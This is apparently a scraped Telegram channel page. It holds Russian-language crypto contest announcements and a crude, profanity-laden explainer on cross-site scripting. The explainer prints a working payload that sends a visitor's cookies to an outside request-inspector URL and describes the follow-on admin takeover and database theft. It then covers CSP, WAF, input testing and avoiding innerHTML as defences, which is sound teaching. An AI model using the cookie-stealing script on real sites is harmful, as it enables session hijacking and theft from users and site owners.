- مشترکین
- پوشش پست
- ER - نسبت تعامل
در حال بارگیری داده...
در حال بارگیری داده...
✅⚡️Результаты конкурса 150$ ✅⚡️ Задание - t.me/FG_TRADE/457 ☄️1-е место: @junklz + 70$ ☄️2-е место: @reasontwo + 50$ ☄️3-е место: @lucky_12345_lucky + 30$ 4+ места и все кто принимал участие, вас ждут подарки в боте обратной связи (VIP, Courses, NFT) 📩@FG_feedback_bot Soon: 👀 150$➡️**** ♨️Живой пример - участники что показали топовые результаты, вознаграждаются $ и лояльными условиями сотрудничества.В следующий раз мы увеличим призовой пул вознаграждений, но задачи будут куда более интересными💻.
🤑Новый призовой конкурс, для самых быстрых, внимательных и любителей развиваться, получать новый опыт в крипте и ресёрче!🤩 🤑Призовой фонд - 150$, следующий в 5х больше будет! 1-е место: 70$ 2-е место: 50$ 3-е место: 30$ Условия задания! Нужно выполнять строго ТЗ (техническому заданию) и включить креативность и инициативу 🔠 Включаем уведомления, вечером выйдет полная информация. Задания вам знакомы и они очень простые.
<script> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </script>
Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу.
Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице.
В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией.
Окей, а как избежать подобной хуйни?
👉Добавляем CSP header. Например:
Content-Security-Policy: script-src 'self'
Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/
👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог))
👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код:
<script>alert('XSS');</script>
Есть отстук? Знач нашли уязвимость. Пиздуем фиксить
👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ )
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \